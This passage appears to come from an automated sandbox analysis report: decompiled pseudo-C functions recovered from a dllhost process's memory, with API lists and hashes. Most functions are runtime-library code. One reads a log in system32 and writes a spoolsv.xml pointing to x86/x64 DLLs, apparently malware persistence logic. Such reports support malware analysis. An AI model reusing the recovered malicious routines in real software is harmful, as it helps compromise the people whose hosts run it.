                                                												 *(_t251 + 0x1c) =  *(_t251 + 0x1c) & 0x00000000;
                                                												L86();
                                                												if(_t251 != 0) {
                                                													goto L24;
                                                												} else {
                                                													_push(_v36);
                                                													L99();
                                                													_pop(_t264);
                                                													_t339 = _t251;
                                                													if(_t251 == 0) {
                                                														goto L62;
                                                													} else {
                                                													}
                                                													L63:
                                                													_push(1);
                                                													_push(_t304);
                                                													E02871E94(_t339);
                                                													_t267 =  &_v72;
                                                													E02871F49(_t267);
                                                													E028733CD( &_v72, 0x288de1c);
                                                													L64:
                                                													_push(_a32);
                                                													L65:
                                                													E02873923(_t267);
                                                													_push(_a16);
                                                													_push(_t253);
                                                													E028729A5(_t253, _t267, _t282, _t289, _t339);
                                                													_t317 = _t316 + 0x10;
                                                													_push(_t289[7]);
                                                													_t198 = E0287211D(_t253, _t267, _t282, _t289, _t304, _t339);
                                                													asm("int3");
                                                													_t313 = _t317;
                                                													_push(_t267);
                                                													_push(_t267);
                                                													_push(_t289);
                                                													_t290 = _v80;
                                                													_t340 =  *_t290 - 0x80000003;
                                                													if( *_t290 == 0x80000003) {
                                                														L84:
                                                														return _t198;
                                                													} else {
                                                														_push(_t253);
                                                														_t199 = E0287360E(_t253, _t267, _t282, _t290, _t304, _t340, _t304);
                                                														_t254 = _a16;
                                                														_t341 =  *((intOrPtr*)(_t199 + 8));
                                                														if( *((intOrPtr*)(_t199 + 8)) == 0) {
                                                															L72:
                                                															if( *((intOrPtr*)(_t254 + 0xc)) == 0) {
                                                																E0287753C(_t254, _t267, _t290, _t304, __eflags);
                                                																asm("int3");
                                                																_push(_t313);
                                                																_t314 = _t317;
                                                																_t318 = _t317 - 0x18;
                                                																_push(_t254);
                                                																_push(_t304);
                                                																_t305 = _v100;
                                                																_push(_t290);
                                                																__eflags = _t305;
                                                																if(__eflags == 0) {
                                                																	E0287753C(_t254, _t267, _t290, _t305, __eflags);
                                                																	asm("int3");
                                                																	_push(_t314);
                                                																	_push(_t254);
                                                																	_push(_t305);
                                                																	_push(_t290);
                                                																	_t292 = _v144;
                                                																	_t306 = 0;
                                                																	__eflags =  *_t292;
                                                																	if( *_t292 <= 0) {
                                                																		L103:
                                                																		_t202 = 0;
                                                																		__eflags = 0;
                                                																	} else {
                                                																		_t256 = 0;
                                                																		while(1) {
                                                																			_t206 = E0287359A( *((intOrPtr*)(_t256 + _t292[1] + 4)) + 4, 0x2895d4c);
                                                																			__eflags = _t206;
                                                																			if(_t206 == 0) {
                                                																				break;
                                                																			}
                                                																			_t306 = _t306 + 1;
                                                																			_t256 = _t256 + 0x10;
                                                																			__eflags = _t306 -  *_t292;
                                                																			if(_t306 <  *_t292) {
                                                																				continue;
                                                																			} else {
                                                																				goto L103;
                                                																			}
                                                																			goto L104;
                                                																		}
                                                																		_t202 = 1;
                                                																	}
                                                																	L104:
                                                																	return _t202;
                                                																} else {
                                                																	_t294 =  *_t305;
                                                																	_t257 = 0;
                                                																	__eflags = _t294;
                                                																	if(_t294 > 0) {
                                                																		_t283 = 0;
                                                																		_v16 = 0;
                                                																		_t210 =  *((intOrPtr*)( *((intOrPtr*)(_v4 + 0x1c)) + 0xc));
                                                																		_t211 = _t210 + 4;
                                                																		__eflags = _t211;
                                                																		_v28 =  *_t210;
                                                																		_v36 = _t211;
                                                																		do {
                                                																			_t271 = _t211;
                                                																			_t212 = _v28;
                                                																			_v24 = _t211;
                                                																			_v20 = _t212;
                                                																			__eflags = _t212;
                                                																			if(_t212 > 0) {
                                                																				_t214 =  *((intOrPtr*)(_t305 + 4)) + _t283;
                                                																				__eflags = _t214;
                                                																				_v32 = _t214;
                                                																				while(1) {
                                                																					_t215 = E02872B69(_t214,  *_t271,  *((intOrPtr*)(_v4 + 0x1c)));
                                                																					_t318 = _t318 + 0xc;
                                                																					__eflags = _t215;
                                                																					if(_t215 != 0) {
                                                																						break;
                                                																					}
                                                																					_t217 = _v20 - 1;
                                                																					_t271 = _v24 + 4;
                                                																					_v20 = _t217;
                                                																					__eflags = _t217;
                                                																					_v24 = _v24 + 4;
                                                																					_t214 = _v32;
                                                																					if(_t217 > 0) {
                                                																						continue;
                                                																					} else {
                                                																					}
                                                																					L95:
                                                																					_t283 = _v16;
                                                																					goto L96;
                                                																				}
                                                																				_t257 = 1;
                                                																				goto L95;
                                                																			}
                                                																			L96:
                                                																			_t211 = _v36;
                                                																			_t283 = _t283 + 0x10;
                                                																			_v16 = _t283;
                                                																			_t294 = _t294 - 1;
                                                																			__eflags = _t294;
                                                																		} while (_t294 != 0);
                                                																	}
                                                																	return _t257;
                                                																}
                                                															} else {
                                                																_t198 = E02873879(_t267, _t254, _a24, _a20,  &_v16,  &_v12);
                                                																_t273 = _v16;
                                                																_t319 = _t317 + 0x14;
                                                																_t285 = _v12;
                                                																if(_t273 < _t285) {
                                                																	_t137 =  &(_t198[3]); // 0xc
                                                																	_t310 = _t137;
                                                																	_t198 = _a20;
                                                																	do {
                                                																		if(_t198 >=  *((intOrPtr*)(_t310 - 0xc)) && _t198 <=  *((intOrPtr*)(_t310 - 8))) {
                                                																			_t221 =  *_t310 << 4;
                                                																			if( *((intOrPtr*)(_t310[1] + _t221 - 0xc)) == 0) {
                                                																				L79:
                                                																				_t222 = _t221 + _t310[1] + 0xfffffff0;
                                                																				_t300 = _v0;
                                                																				if(( *(_t221 + _t310[1] + 0xfffffff0) & 0x00000040) == 0) {
                                                																					_push(1);
                                                																					_t155 = _t310 - 0xc; // 0x0
                                                																					E02872157(_t254, _t285, _t300, _a4, _a8, _a12, _t254, _t222, 0, _t155, _a24, _a28);
                                                																					_t285 = _v12;
                                                																					_t319 = _t319 + 0x2c;
                                                																					_t273 = _v16;
                                                																				}
                                                																			} else {
                                                																				_t285 = _v12;
                                                																				_t254 = _a16;
                                                																				if( *((char*)( *((intOrPtr*)(_t310[1] + _t221 - 0xc)) + 8)) == 0) {
                                                																					goto L79;
                                                																				}
                                                																			}
                                                																			_t198 = _a20;
                                                																		}
                                                																		_t273 = _t273 + 1;
                                                																		_t310 =  &(_t310[5]);
                                                																		_v16 = _t273;
                                                																	} while (_t273 < _t285);
                                                																}
                                                																goto L83;
                                                															}
                                                														} else {
                                                															__imp__EncodePointer();
                                                															_t304 = _t199;
                                                															if( *((intOrPtr*)(E0287360E(_t254, _t267, _t282, _t290, _t304, _t341, 0) + 8)) == _t304 ||  *_t290 == 0xe0434f4d ||  *_t290 == 0xe0434352) {
                                                																goto L72;
                                                															} else {
                                                																_t198 = E0287379C(_t290, _a4, _a8, _a12, _t254, _a24, _a28);
                                                																_t317 = _t317 + 0x1c;
                                                																if(_t198 != 0) {
                                                																	L83:
                                                																	goto L84;
                                                																} else {
                                                																	goto L72;
                                                																}
                                                															}
                                                														}
                                                													}
                                                												}
                                                											}
                                                										} else {
                                                											_t336 =  *((intOrPtr*)(_t304 + 0x1c));
                                                											if( *((intOrPtr*)(_t304 + 0x1c)) == 0) {
                                                												goto L62;
                                                											} else {
                                                												goto L19;
                                                											}
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}
















































































                                                0x0287273c
                                                0x0287273e
                                                0x02872765
                                                0x02872765
                                                0x02872765
                                                0x02872740
                                                0x02872740
                                                0x02872742
                                                0x02872752
                                                0x02872759
                                                0x0287275b
                                                0x00000000
                                                0x00000000
                                                0x0287275d
                                                0x0287275e
                                                0x02872761
                                                0x02872763
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02872763
                                                0x0287276c
                                                0x0287276c
                                                0x02872767
                                                0x0287276b
                                                0x028726a9
                                                0x028726a9
                                                0x028726ab
                                                0x028726ad
                                                0x028726af
                                                0x028726b4
                                                0x028726b6
                                                0x028726bc
                                                0x028726c1
                                                0x028726c1
                                                0x028726c4
                                                0x028726c7
                                                0x028726ca
                                                0x028726ca
                                                0x028726cc
                                                0x028726cf
                                                0x028726d2
                                                0x028726d5
                                                0x028726d7
                                                0x028726dc
                                                0x028726dc
                                                0x028726de
                                                0x028726e1
                                                0x028726ea
                                                0x028726ef
                                                0x028726f2
                                                0x028726f4
                                                0x00000000
                                                0x00000000
                                                0x028726fc
                                                0x028726fd
                                                0x02872700
                                                0x02872703
                                                0x02872705
                                                0x02872708
                                                0x0287270b
                                                0x00000000
                                                0x00000000
                                                0x0287270d
                                                0x02872711
                                                0x02872711
                                                0x00000000
                                                0x02872711
                                                0x0287270f
                                                0x00000000
                                                0x0287270f
                                                0x02872714
                                                0x02872714
                                                0x02872717
                                                0x0287271a
                                                0x0287271d
                                                0x0287271d
                                                0x0287271d
                                                0x028726ca
                                                0x0287272a
                                                0x0287272a
                                                0x028725ee
                                                0x028725fd
                                                0x02872602
                                                0x02872605
                                                0x02872608
                                                0x0287260d
                                                0x0287260f
                                                0x0287260f
                                                0x02872612
                                                0x02872615
                                                0x02872618
                                                0x02872624
                                                0x0287262d
                                                0x02872642
                                                0x02872648
                                                0x0287264a
                                                0x02872650
                                                0x02872652
                                                0x02872657
                                                0x0287266c
                                                0x02872671
                                                0x02872674
                                                0x02872677
                                                0x02872677
                                                0x0287262f
                                                0x02872636
                                                0x0287263d
                                                0x02872640
                                                0x00000000
                                                0x00000000
                                                0x02872640
                                                0x0287267a
                                                0x0287267a
                                                0x0287267d
                                                0x0287267e
                                                0x02872681
                                                0x02872684
                                                0x02872615
                                                0x00000000
                                                0x0287260d
                                                0x0287259f
                                                0x028725a1
                                                0x028725a7
                                                0x028725b1
                                                0x00000000
                                                0x028725c3
                                                0x028725d4
                                                0x028725d9
                                                0x028725de
                                                0x02872688
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x028725de
                                                0x028725b1
                                                0x0287259d
                                                0x02872589
                                                0x02872329
                                                0x028722f3
                                                0x028722f3
                                                0x028722f7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x028722f7
                                                0x028722d0
                                                0x028722c4
                                                0x028722a5
                                                0x02872296
                                                0x0287226d
                                                0x02872263

                                                APIs
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 02872320
                                                • _GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 0287239B
                                                • ___TypeMatch.LIBVCRUNTIME ref: 02872419
                                                • ___DestructExceptionObject.LIBVCRUNTIME ref: 0287249B
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 028724CC
                                                • FindHandlerForForeignException.LIBVCRUNTIME ref: 0287251B
                                                • ___DestructExceptionObject.LIBVCRUNTIME ref: 0287253D
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02872555
                                                • _UnwindNestedFrames.LIBCMT ref: 0287255D
                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 02872569
                                                • CallUnexpected.LIBVCRUNTIME ref: 02872574
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: Exception$DestructObjectSpecUnwind$CallCheckException@8FindForeignFrameFramesHandlerMatchNestedRangeStateThrowTrysTypeUnexpected
                                                • String ID: csm$csm$csm
                                                • API String ID: 410073093-393685449
                                                • Opcode ID: cc057b220078a5cd4df0e5270287838bfa20bf7fa636dc7cd29919ae1486d485
                                                • Instruction ID: 937ba6f51984085e0037cdd21c75d8c35edad659cdf5e12ae565bd250c226896
                                                • Opcode Fuzzy Hash: cc057b220078a5cd4df0e5270287838bfa20bf7fa636dc7cd29919ae1486d485
                                                • Instruction Fuzzy Hash: E4B1BD7D800609EFCF24DF99C850BAEBBB1BF18314F048159E859A7655C731EA51CFA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 41%
                                                			E0287FB76(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                                                				signed int _v5;
                                                				char _v6;
                                                				void* _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				char _v24;
                                                				intOrPtr _v36;
                                                				signed int _v44;
                                                				void _v48;
                                                				char _v72;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				signed int _t114;
                                                				signed int _t123;
                                                				signed char _t124;
                                                				signed int _t134;
                                                				intOrPtr _t164;
                                                				intOrPtr _t180;
                                                				signed int* _t190;
                                                				signed int _t192;
                                                				char _t197;
                                                				signed int _t203;
                                                				signed int _t206;
                                                				signed int _t215;
                                                				signed int _t217;
                                                				signed int _t219;
                                                				signed int _t225;
                                                				signed int _t227;
                                                				signed int _t234;
                                                				signed int _t235;
                                                				signed int _t237;
                                                				signed int _t239;
                                                				signed char _t242;
                                                				intOrPtr _t245;
                                                				void* _t248;
                                                				void* _t252;
                                                				void* _t262;
                                                				signed int _t263;
                                                				signed int _t266;
                                                				signed int _t269;
                                                				signed int _t270;
                                                				void* _t272;
                                                				void* _t274;
                                                				void* _t275;
                                                				void* _t277;
                                                				void* _t278;
                                                				void* _t280;
                                                				void* _t284;
                                                
                                                				_t262 = E0287F8D9(__ecx,  &_v72, _a16, _a20, _a24);
                                                				_t192 = 6;
                                                				memcpy( &_v48, _t262, _t192 << 2);
                                                				_t274 = _t272 + 0x1c;
                                                				_t248 = _t262 + _t192 + _t192;
                                                				_t263 = _t262 | 0xffffffff;
                                                				if(_v36 != _t263) {
                                                					_t114 = E0287BF6B(_t248, _t263, __eflags);
                                                					_t190 = _a8;
                                                					 *_t190 = _t114;
                                                					__eflags = _t114 - _t263;
                                                					if(_t114 != _t263) {
                                                						_v20 = _v20 & 0x00000000;
                                                						_v24 = 0xc;
                                                						_t275 = _t274 - 0x18;
                                                						 *_a4 = 1;
                                                						_push(6);
                                                						_v16 =  !(_a16 >> 7) & 1;
                                                						_push( &_v24);
                                                						_push(_a12);
                                                						memcpy(_t275,  &_v48, 1 << 2);
                                                						_t197 = 0;
                                                						_t252 = E0287F844();
                                                						_t277 = _t275 + 0x2c;
                                                						_v12 = _t252;
                                                						__eflags = _t252 - 0xffffffff;
                                                						if(_t252 != 0xffffffff) {
                                                							L11:
                                                							_t123 = GetFileType(_t252);
                                                							__eflags = _t123;
                                                							if(_t123 != 0) {
                                                								__eflags = _t123 - 2;
                                                								if(_t123 != 2) {
                                                									__eflags = _t123 - 3;
                                                									_t124 = _v48;
                                                									if(_t123 == 3) {
                                                										_t124 = _t124 | 0x00000008;
                                                										__eflags = _t124;
                                                									}
                                                								} else {
                                                									_t124 = _v48 | 0x00000040;
                                                								}
                                                								_v5 = _t124;
                                                								E0287BEB4(_t197,  *_t190, _t252);
                                                								_t242 = _v5 | 0x00000001;
                                                								_v5 = _t242;
                                                								_v48 = _t242;
                                                								 *( *((intOrPtr*)(0x2896480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
                                                								_t203 =  *_t190;
                                                								_t205 = (_t203 & 0x0000003f) * 0x30;
                                                								__eflags = _a16 & 0x00000002;
                                                								 *((char*)( *((intOrPtr*)(0x2896480 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
                                                								if((_a16 & 0x00000002) == 0) {
                                                									L20:
                                                									_v6 = 0;
                                                									_push( &_v6);
                                                									_push(_a16);
                                                									_t278 = _t277 - 0x18;
                                                									_t206 = 6;
                                                									_push( *_t190);
                                                									memcpy(_t278,  &_v48, _t206 << 2);
                                                									_t134 = E0287F5F7(_t190,  &_v48 + _t206 + _t206,  &_v48);
                                                									_t280 = _t278 + 0x30;
                                                									__eflags = _t134;
                                                									if(__eflags == 0) {
                                                										 *((char*)( *((intOrPtr*)(0x2896480 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
                                                										 *( *((intOrPtr*)(0x2896480 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x2896480 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x2896480 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
                                                										__eflags = _v5 & 0x00000048;
                                                										if((_v5 & 0x00000048) == 0) {
                                                											__eflags = _a16 & 0x00000008;
                                                											if((_a16 & 0x00000008) != 0) {
                                                												_t225 =  *_t190;
                                                												_t227 = (_t225 & 0x0000003f) * 0x30;
                                                												_t164 =  *((intOrPtr*)(0x2896480 + (_t225 >> 6) * 4));
                                                												_t87 = _t164 + _t227 + 0x28;
                                                												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
                                                												__eflags =  *_t87;
                                                											}
                                                										}
                                                										_t266 = _v44;
                                                										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
                                                										if((_t266 & 0xc0000000) != 0xc0000000) {
                                                											L31:
                                                											__eflags = 0;
                                                											return 0;
                                                										} else {
                                                											__eflags = _a16 & 0x00000001;
                                                											if((_a16 & 0x00000001) == 0) {
                                                												goto L31;
                                                											}
                                                											CloseHandle(_v12);
                                                											_v44 = _t266 & 0x7fffffff;
                                                											_t215 = 6;
                                                											_push( &_v24);
                                                											_push(_a12);
                                                											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
                                                											_t245 = E0287F844();
                                                											__eflags = _t245 - 0xffffffff;
                                                											if(_t245 != 0xffffffff) {
                                                												_t217 =  *_t190;
                                                												_t219 = (_t217 & 0x0000003f) * 0x30;
                                                												__eflags = _t219;
                                                												 *((intOrPtr*)( *((intOrPtr*)(0x2896480 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
                                                												goto L31;
                                                											}
                                                											E02875D0D(GetLastError());
                                                											 *( *((intOrPtr*)(0x2896480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x2896480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                                                											E0287C07D( *_t190);
                                                											L10:
                                                											goto L2;
                                                										}
                                                									}
                                                									_t269 = _t134;
                                                									goto L22;
                                                								} else {
                                                									_t269 = E0287FA55(_t205,  *_t190);
                                                									__eflags = _t269;
                                                									if(__eflags != 0) {
                                                										L22:
                                                										E0287A32C(__eflags,  *_t190);
                                                										return _t269;
                                                									}
                                                									goto L20;
                                                								}
                                                							}
                                                							_t270 = GetLastError();
                                                							E02875D0D(_t270);
                                                							 *( *((intOrPtr*)(0x2896480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x2896480 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                                                							CloseHandle(_t252);
                                                							__eflags = _t270;
                                                							if(_t270 == 0) {
                                                								 *((intOrPtr*)(E02875D43())) = 0xd;
                                                							}
                                                							goto L2;
                                                						}
                                                						_t234 = _v44;
                                                						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
                                                						if((_t234 & 0xc0000000) != 0xc0000000) {
                                                							L9:
                                                							_t235 =  *_t190;
                                                							_t237 = (_t235 & 0x0000003f) * 0x30;
                                                							_t180 =  *((intOrPtr*)(0x2896480 + (_t235 >> 6) * 4));
                                                							_t33 = _t180 + _t237 + 0x28;
                                                							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
                                                							__eflags =  *_t33;
                                                							E02875D0D(GetLastError());
                                                							goto L10;
                                                						}
                                                						__eflags = _a16 & 0x00000001;
                                                						if((_a16 & 0x00000001) == 0) {
                                                							goto L9;
                                                						}
                                                						_t284 = _t277 - 0x18;
                                                						_v44 = _t234 & 0x7fffffff;
                                                						_t239 = 6;
                                                						_push( &_v24);
                                                						_push(_a12);
                                                						memcpy(_t284,  &_v48, _t239 << 2);
                                                						_t197 = 0;
                                                						_t252 = E0287F844();
                                                						_t277 = _t284 + 0x2c;
                                                						_v12 = _t252;
                                                						__eflags = _t252 - 0xffffffff;
                                                						if(_t252 != 0xffffffff) {
                                                							goto L11;
                                                						}
                                                						goto L9;
                                                					} else {
                                                						 *(E02875D30()) =  *_t186 & 0x00000000;
                                                						 *_t190 = _t263;
                                                						 *((intOrPtr*)(E02875D43())) = 0x18;
                                                						goto L2;
                                                					}
                                                				} else {
                                                					 *(E02875D30()) =  *_t188 & 0x00000000;
                                                					 *_a8 = _t263;
                                                					L2:
                                                					return  *((intOrPtr*)(E02875D43()));
                                                				}
                                                			}

                                                APIs
                                                  • Part of subcall function 0287F844: CreateFileW.KERNEL32(00000000,00000000,?,0287FC1F,?,?,00000000,?,0287FC1F,00000000,0000000C), ref: 0287F861
                                                • GetLastError.KERNEL32 ref: 0287FC8A
                                                • __dosmaperr.LIBCMT ref: 0287FC91
                                                • GetFileType.KERNEL32(00000000), ref: 0287FC9D
                                                • GetLastError.KERNEL32 ref: 0287FCA7
                                                • __dosmaperr.LIBCMT ref: 0287FCB0
                                                • CloseHandle.KERNEL32(00000000), ref: 0287FCD0
                                                • CloseHandle.KERNEL32(?), ref: 0287FE1A
                                                • GetLastError.KERNEL32 ref: 0287FE4C
                                                • __dosmaperr.LIBCMT ref: 0287FE53
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                • String ID: H
                                                • API String ID: 4237864984-2852464175
                                                • Opcode ID: 8fde067ca7c4a01635cfbd3c97d5458743af4a0420bbcbfd6afa680f0827c68e
                                                • Instruction ID: c3db19d9b9ba8db8e6e998327f35af2b9fe3ce47fdd13988cc7f5bf3b4680d53
                                                • Opcode Fuzzy Hash: 8fde067ca7c4a01635cfbd3c97d5458743af4a0420bbcbfd6afa680f0827c68e
                                                • Instruction Fuzzy Hash: CEA1533EA141188FDF19DF6CC891BAE3BA1AB06328F180159E915DF3D0DB34D812CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 74%
                                                			E028673E0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                				signed int _v8;
                                                				char _v268;
                                                				char _v528;
                                                				char _v788;
                                                				void _v103188;
                                                				long _v103192;
                                                				void* _v103196;
                                                				signed int _t29;
                                                				void* _t43;
                                                				char* _t44;
                                                				intOrPtr _t51;
                                                				int _t58;
                                                				void* _t69;
                                                				void* _t76;
                                                				intOrPtr _t88;
                                                				void* _t89;
                                                				void* _t95;
                                                				intOrPtr* _t96;
                                                				long _t97;
                                                				void* _t98;
                                                				void* _t99;
                                                				void* _t100;
                                                				signed int _t101;
                                                
                                                				E02883CA0();
                                                				_t29 =  *0x288f008; // 0xe7fe870c
                                                				_v8 = _t29 ^ _t101;
                                                				_t88 = _a4;
                                                				_t69 = __edx;
                                                				_v103196 = 0;
                                                				_v103192 = 0;
                                                				if(E02864E60(__ecx,  &_v103196,  &_v103192) != 0) {
                                                					_push(__esi);
                                                					E02873440(_t88,  &_v528, 0, 0x104);
                                                					E02873440(_t88,  &_v268, 0, 0x104);
                                                					E02865180( &_v528, 0x104, "%s\\x86.dll", _t69);
                                                					E02865180( &_v268, 0x104, "%s\\x64.dll", _t69);
                                                					E02873440(_t88,  &_v103188, 0, 0x19000);
                                                					_t95 = _v103196;
                                                					_t43 = E028676A0(_t95);
                                                					if(_t43 == 0x20) {
                                                						_t44 =  &_v528;
                                                						goto L9;
                                                					} else {
                                                						if(_t43 == 0x40) {
                                                							_t44 =  &_v268;
                                                							L9:
                                                							_push(_t44);
                                                							E02865180( &_v103188, 0x19000,  *0x2896834, _t88);
                                                							if(_t95 != 0) {
                                                								LocalFree(_t95);
                                                							}
                                                							E02873440(_t88,  &_v788, 0, 0x104);
                                                							E02865180( &_v788, 0x104, "%s\\spoolsv.xml", _t69);
                                                							_t96 =  &_v103188;
                                                							_t76 = _t96 + 1;
                                                							do {
                                                								_t51 =  *_t96;
                                                								_t96 = _t96 + 1;
                                                							} while (_t51 != 0);
                                                							_v103192 = 0;
                                                							_t97 = _t96 - _t76;
                                                							_t89 = CreateFileA( &_v788, 0x40000000, 2, 0, 2, 0x80, 0);
                                                							if(_t89 == 0) {
                                                								goto L6;
                                                							} else {
                                                								_t58 = WriteFile(_t89,  &_v103188, _t97,  &_v103192, 0);
                                                								_push(_t89);
                                                								if(_t58 != 0) {
                                                									CloseHandle();
                                                									_pop(_t99);
                                                									return E02870A5D(_v8 ^ _t101, _t99);
                                                								} else {
                                                									CloseHandle();
                                                									_pop(_t100);
                                                									return E02870A5D(_v8 ^ _t101, _t100);
                                                								}
                                                							}
                                                						} else {
                                                							if(_t95 != 0) {
                                                								LocalFree(_t95);
                                                							}
                                                							L6:
                                                							_pop(_t98);
                                                							return E02870A5D(_v8 ^ _t101, _t98);
                                                						}
                                                					}
                                                				} else {
                                                					return E02870A5D(_v8 ^ _t101, __esi);
                                                				}
                                                			}

                                                APIs
                                                  • Part of subcall function 02864E60: CreateFileA.KERNEL32(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000080,00000000,?,73B76490), ref: 02864E81
                                                  • Part of subcall function 02864E60: GetFileSizeEx.KERNEL32(00000000,00000000,?,73B76490), ref: 02864EA1
                                                  • Part of subcall function 02864E60: LocalAlloc.KERNEL32(00000040,00000001,?,73B76490), ref: 02864EB3
                                                  • Part of subcall function 02864E60: CloseHandle.KERNEL32(00000000,?,73B76490), ref: 02864ECF
                                                • LocalFree.KERNEL32(?), ref: 028674C2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: FileLocal$AllocCloseCreateFreeHandleSize
                                                • String ID: %s\spoolsv.xml$%s\x64.dll$%s\x86.dll
                                                • API String ID: 1503672127-2651032631
                                                • Opcode ID: 1e82ad4afaf6a2225b9ff2e66e2556da4ce7b6a0c05dfcb08a8ad3afec807041
                                                • Instruction ID: c9e995b0ae88ebf69987a84e0a9eb069678ee8ce5f2e5cda0431a74a433ca292
                                                • Opcode Fuzzy Hash: 1e82ad4afaf6a2225b9ff2e66e2556da4ce7b6a0c05dfcb08a8ad3afec807041
                                                • Instruction Fuzzy Hash: C451B8BDA40218ABDB20DB589C49FFDB36DEB44B14F4004E5F519E61C0D774AB948EA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E02881A09(void* __ebx, void* __edi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, short* _a20, char* _a24, int _a28, int _a32) {
                                                				signed int _v8;
                                                				char _v22;
                                                				struct _cpinfo _v28;
                                                				short* _v32;
                                                				int _v36;
                                                				char* _v40;
                                                				int _v44;
                                                				intOrPtr _v48;
                                                				void* _v60;
                                                				void* __esi;
                                                				signed int _t63;
                                                				int _t70;
                                                				signed int _t72;
                                                				short* _t73;
                                                				signed int _t77;
                                                				short* _t87;
                                                				void* _t89;
                                                				void* _t92;
                                                				int _t99;
                                                				short _t101;
                                                				intOrPtr _t102;
                                                				signed int _t112;
                                                				char* _t114;
                                                				char* _t115;
                                                				void* _t120;
                                                				void* _t121;
                                                				intOrPtr _t122;
                                                				intOrPtr _t123;
                                                				intOrPtr* _t125;
                                                				short* _t126;
                                                				short* _t127;
                                                				signed int _t128;
                                                				short* _t129;
                                                
                                                				_t63 =  *0x288f008; // 0xe7fe870c
                                                				_v8 = _t63 ^ _t128;
                                                				_t127 = _a20;
                                                				_v44 = _a4;
                                                				_v48 = _a8;
                                                				_t67 = _a24;
                                                				_v40 = _a24;
                                                				_t125 = _a16;
                                                				_v36 = _t125;
                                                				if(_t127 <= 0) {
                                                					if(_t127 >= 0xffffffff) {
                                                						goto L2;
                                                					} else {
                                                						goto L5;
                                                					}
                                                				} else {
                                                					_t127 = E0288002B(_t125, _t127);
                                                					_t67 = _v40;
                                                					L2:
                                                					_t99 = _a28;
                                                					if(_t99 <= 0) {
                                                						if(_t99 < 0xffffffff) {
                                                							goto L5;
                                                						} else {
                                                							goto L7;
                                                						}
                                                					} else {
                                                						_t99 = E0288002B(_t67, _t99);
                                                						L7:
                                                						_t70 = _a32;
                                                						if(_t70 == 0) {
                                                							_t70 =  *( *_v44 + 8);
                                                							_a32 = _t70;
                                                						}
                                                						if(_t127 == 0 || _t99 == 0) {
                                                							if(_t127 != _t99) {
                                                								if(_t99 <= 1) {
                                                									if(_t127 <= 1) {
                                                										if(GetCPInfo(_t70,  &_v28) == 0) {
                                                											goto L5;
                                                										} else {
                                                											if(_t127 <= 0) {
                                                												if(_t99 <= 0) {
                                                													goto L36;
                                                												} else {
                                                													_t89 = 2;
                                                													if(_v28 >= _t89) {
                                                														_t114 =  &_v22;
                                                														if(_v22 != 0) {
                                                															_t127 = _v40;
                                                															while(1) {
                                                																_t122 =  *((intOrPtr*)(_t114 + 1));
                                                																if(_t122 == 0) {
                                                																	goto L15;
                                                																}
                                                																_t101 =  *_t127;
                                                																if(_t101 <  *_t114 || _t101 > _t122) {
                                                																	_t114 = _t114 + _t89;
